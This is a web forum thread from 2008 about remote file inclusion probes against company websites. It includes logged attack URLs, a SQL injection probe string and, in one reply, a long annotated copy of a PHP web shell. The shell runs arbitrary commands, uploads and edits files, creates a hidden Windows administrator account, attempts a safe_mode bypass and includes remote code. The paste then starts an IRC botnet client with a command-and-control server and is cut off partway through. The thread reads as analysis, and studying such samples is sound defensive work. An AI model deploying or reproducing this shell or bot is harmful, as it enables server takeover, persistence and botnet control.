|
Weird injection attempts
Last post 02-21-2008 2:09 PM by zzo38. 8 replies.
-
01-15-2008 6:51 PM
|
|
-
bighusker
  - Joined on 01-20-2007
- Posts 52
|
So...We noticed that some script kiddy (or zombie computers) was attempting to pull off some URL-parameter injection on some of our websites. Most often, they tried to change one of the URL parameters to a URL (i.e. http://www.example.com/?var=http://www.1337h4x0r/script.php). When I went to the URL being passed in, I found some PHP code: <?php echo md5("just_a_test")> Besides the fact that *none* of our pages are running on PHP, how in the hell is this supposed to work? Are there pages out there that accept a URL as an argument and then arbitrarily execute whatever code is on that page? Is this some crazy bug in an older version of PHP?
|
|
-
-
PSWorx
  - Joined on 04-28-2006
- Posts 682
|
Re: Weird injection attempts
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature) PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script. In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say include($_GET["module"] . "/init.php"); in Joe Braindead's PHP script and you got your function on the silver table.
|
|
-
-
asuffield
 - Joined on 05-31-2006
- Posts 2,137
|
Re: Weird injection attempts
I expect they're probing for XSS holes. If they find a way to inject html goop into your pages, the real attack would contain a chunk of javascript instead.
|
|
-
-
bighusker
- Joined on 01-20-2007
- Posts 52
|
Re: Weird injection attempts
 PSWorx:It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature) PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script. In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say include($_GET["module"] . "/init.php"); in Joe Braindead's PHP script and you got your function on the silver table.
Ah, that makes sense. Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!
|
|
-
-
vt_mruhlin
  - Joined on 03-01-2007
- Austin, TX
- Posts 408
|
Re: Weird injection attempts
bighusker: PSWorx: It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature) PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script. In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say include($_GET["module"] . "/init.php"); in Joe Braindead's PHP script and you got your function on the silver table.
Ah, that makes sense. Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!
I see you're new to this site.
|
|
-
-
galgorah
  - Joined on 04-18-2007
- Boston, Ma
- Posts 128
|
Re: Weird injection attempts
I've been getting the same thing It happens 5 times day withing 5 minutes always around 10am. we're getting two things happening.
http://www.company.com/pcc/index.aspx?lnkID=http://www.sectoranime.com.mx/galeria/include/nokuc/kef/&imgID=PCC_conferences.jpg threw an error message.
and
your usual sql injection attempts.
http://www.masspartnership.com/about/index.aspx?imgid=newsandevents.jpg&lnkid=newsandevents.ascx' and user>0 and ''=' threw an error message.
going to the url's shown always shows the same bit of php code. <?php echo md5("just_a_test")>
I've got a lit of 10 sites. that they try to pass.
"Void* is not actually void*" - Best error message EVER!
My method of measuring code quality is to ask myself if I would rather have herpes or maintain the code in question. In this case I would choose death by herpes. --akatherder
People who work in VB or any variant thereof are not programmers, they are circus chimps throwing feces into an IDE... --chebrock
My dad chased him off with a shotgun, which apparently pissed this guy off so much he felt the need to strip naked, sit in the middle of his front yard, and chop up live kittens with a machete to feed to his pet boa.
|
|
-
-
galgorah
- Joined on 04-18-2007
- Boston, Ma
- Posts 128
|
Re: Weird injection attempts
found this on the web Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
/forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
kalafi0r seems to be some Polish script kiddy. On the move:
http://security.pigstye.net/staticpages/index.php/index
$ nslookup 162.39.119.102
Server: 216.201.118.101
Address: 216.201.118.101#53
Non-authoritative answer:
102.119.39.162.in-addr.arpa name = h102.119.39.162.ip.alltel.net.
TRACE:
traceroute to h102.119.39.162.ip.alltel.net (162.39.119.102), 30 hops max, 38 byte packets
...
6 tbr2.attga.ip.att.net (12.122.10.137) 59.477 ms 55.821 ms 55.611 ms
MPLS Label=31746 CoS=3 TTL=1 S=0
7 gar5.attga.ip.att.net (12.123.20.181) 54.272 ms 54.308 ms 55.562 ms
8 12.118.120.118 (12.118.120.118) 54.081 ms 58.049 ms 85.980 ms
9 h121.21.213.151.ip.alltel.net (151.213.21.121) 63.574 ms 64.787 ms 64.962 ms
10 h54.33.213.151.ip.alltel.net (151.213.33.54) 62.919 ms h58.33.213.151.ip.alltel.net (151.213.33.58) 65.127 ms 64.626 ms
11 h123.21.213.151.ip.alltel.net (151.213.21.123) 70.105 ms h107.21.213.151.ip.alltel.net (151.213.21.107) 108.281 ms h123.21.213.151.ip.alltel.net (151.213.21.123) 68.374 ms
12 mthwnc-7200-2.alltel.net (166.102.102.232) 68.345 ms 68.061 ms 68.389 ms
13 h97.119.39.162.ip.alltel.net (162.39.119.97) 74.313 ms 74.527 ms 77.739 ms
14 h102.119.39.162.ip.alltel.net (162.39.119.102) 79.976 ms 77.663 ms 76.522
Matthews, North Carolina? Not many poles there, probably a bot-infected win box
http://www.google.com/maps?q=Matthews,+NC,+USA&output=html
This topic doesn't exist on this board. - "2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???"
Our attacker is trying to get our server to include some extra unvalidated PHP code. The Lycos page has the following source:
=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ malcode ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<!-- FRONTAPAGE, HUH. SOMEONE HAS A SENSE OF HUMOR :) //-->
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<!-- BY POLSKI SCRIPT KIDD, WHO CAN CUT N PASTE REALLY LEET //-->
<title>By destructive > irc.gigachat.net > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
<?php
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://www.avto.bz/lang/.../cmd.txt?';
// NOT SURE WHAT WE'RE EXPLODING HERE, AVTO.BZ DOESN'T RESOLVE
// ALTHOUGH, THE GOOGLE CACHE SHOWS ITS GHOST:
// http://64.233.169.104/search?q=cache:J3mih5icxVEJ:www.avto.bz/links.php+%22avto.bz%22&hl=en&ct=clnk&cd=7&gl=us
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
// $_SERVER['PHP_SELF'] is filename of the currently executing script
// $fstring WILL BE THE SHORTHAND FOR THE XSS CALL TO OUR SERVER, TO GET IT TO EXECUTE
// ALL OF THE PROGS, FUNCTIONS, ETC
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
// BELOW SOURCES ONLY LOAD SRC FROM http://www.home-equity-loans-1.org/l.php
// CHANGED? ABANDONED?
$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
// LOOKS LIKE WE'RE MAKING WINDOWS ADMIN ACCOUNTS
// LOOK FOR WEBBOT'S INVOCATION OF "$cmd=$newuser"
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';
// HERE'S SOME JS FILE WRANGLING FUNCTIONS (CHMOD, COPY, CD, RENAME, MKDIR)
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Exemple: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Rename file '+ file + ' for:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Rename dir '+ file + ' for:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Which name?', 'NewDir');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Which name?', 'NewFile.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][ .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\">Entrance in the directory, OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to enters it in the directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
// REPLACE BACKSLASH WITH FWD SLASH, YEP ITS FOR WINDOWS ALLRIGHT
$chdir = str_replace(chr(92), chr(47), $chdir);
// CMD==UPLOAD: DENOTE SUCCESS IF WE UPLOAD OUR BOT CODE SUCCESSFULLY
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
//USING HTTP POST TO UPLOAD JUNK ($_FILES)
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>, the archive is validates and was loaded successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error when copying archive.</font>";
}
}
//CMD==MKDIR: MAKE A NEW DIR
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, directory created successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it creates directory.</font>";
}
}
//CMD==NEWFILE: TOUCH OFF A FILE
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, created successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to tries it creates archive.</font>";
}
}
//CMD==DELETE:
// FILES
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded archive!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it I excluded archive!</font>";
}
// DIRS
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded directory!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it I excluded directory!</font>";
}
}
}
// CMD==CHMOD: 777 SOME FILES
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod of</font> <font color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">moved for</font> <font color=\"#000080\">$chmod</font> <font color=\"#008000\">successfully.</font>";
} else {
$msg = '<font color=\"#FF0000\">Error when moving chmod.</font>';
}
}
//CMD==RENAME: RENAME
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font> <font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it nominates archive.</font>";
}
}
//CMD==COPY: DUPE SOME SHIT
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error when copying</font> <font color=\"#000000\">{$file}</font> <font color=\"#FF0000\">for</font> <font color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
//CMD==COMMAND: DO SOME SHIT
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results: <b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
// ERRO AO EXECUTAR COMANDO??? PORTUGUESE HAX0R mebbe?
}
}
elseif (@$_GET['action'] == 'safemode') {
// CHECKING FOR/USING SHARED MEMORY OPS SO WE CAN
// EXECUTE THE PHP SAFE MODE BYPASS:
// http://securityvulns.com/files/safe_mode_bypass.php
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
// PHP SAFE MODE BYPASS:
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\\n"; }
$data="\\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}
// CMD==ZIP FILES
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\\n";
zip_entry_close($zip_entry);
}
echo "\\n";
}
zip_close($zip);
}
}
//CMD==EDIT
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
// read file $filename into string $conteudo
// Conteúdo?? That's Portuguese for "content" y'all - hmmm
// Portuguese?? interesting.....
$conteudo = @file_get_contents($filename);
// Convert special characters to HTML entities
$conteudo = htmlspecialchars($conteudo);
//$_SERVER is an array containing information such as headers, paths, and script locations. IT IS PART OF THE register_globals SECURITY FIASCO (right? check my facts here, I'm not 100% on that).
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing {$file} ...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\" action=\"{$fstring}&action=save&chdir={$chdir}&file={$file}\">";
// NOTICE THE REFERENCE TO "webbot" AND ITS LOGFILE: _private/form_results.csv
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascriptwindow.location='{$fstring}&chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
//CMD==SAVE
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font color=\"#008000\">edited successfully!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">cannot be written!</font>";
}
}
// INVENTORY TIME!!
// Informa��es
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
// LESSEE WHAT KEWL TOOLS ARE PRELOADED FOR US....
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}
//ID THE SYSTEM OS AND PHP VERSIONS
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&action=cmd&chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informa��es</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Sistema:</b> </td></p>";
echo "<td width=\"92%\"> {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Uname: </b></td></p>";
echo "<td width=\"92%\"> {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>PHP: </b></td></p>";
echo "<td width=\"92%\"> {$PHPv}, <b>safe mode:</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Methods: </b></td></p>";
echo "<td width=\"92%\"> {$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Ip: </b></td></p>";
echo "<td width=\"92%\"> {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Command: </b></td></p>";
echo "<td width=\"92%\"> <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"> <input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&action=upload&chdir=$chdir\" enctype=\"multipart/form-data\">";
//webbot upload, mkdir, (use cases, "action=blah")
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=yes\">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=no\">[BackTool]</a></legend>";
}
}
if (@!$handle = opendir("$chdir")) {
echo " I could not enters in the directory, <a href=\"{$fstring}\">click here!</a> for return to the original directory!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"9%\"> Perms</td>";
echo " <td width=\"49%\"> File </td>";
echo " <td width=\"10%\"> Size </td>";
echo " <td width=\"32%\"> Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FFCC66\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #C0C0C0\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width=\"9%\" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir=$chdirpox\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color> <b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color> $file</td>";
}
}
}
echo "<td width=\"10%\" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td width=\"32%\" $color> <a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file\">[Del]</a> <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> <a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
} else {
echo "<td width=\"32%\" $color> <a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir\">[Del]</a> <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> [Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
include 'http://members.lycos.co.uk/kalafi0r/up.txt?';
?>
</table>
</fieldset></form>
<p align="center">
// HEY GREAT!!! AT LEAST CRACKERS CARE ABOUT STANDARDS...
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
</body>
</html>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
up.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<?
// GOSH THIS LOOKS LIKE http://see-your-ip.info/phpbot.txt
set_time_limit(0);
error_reporting(0);
class pBot
{
var $config = array("server"=>"tucows.westlin.com",
"port"=>6667,
"pass"=>"", //senha do server (sendpass to server)
"prefix"=>"elo_bot",
"maxrand"=>8,
"chan"=>"#test",
"key"=>"t3st", //senha do canal (sendpass to channel)
"modes"=>"+p",
"password"=>"root", //senha do bot (sendpass to bot)
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
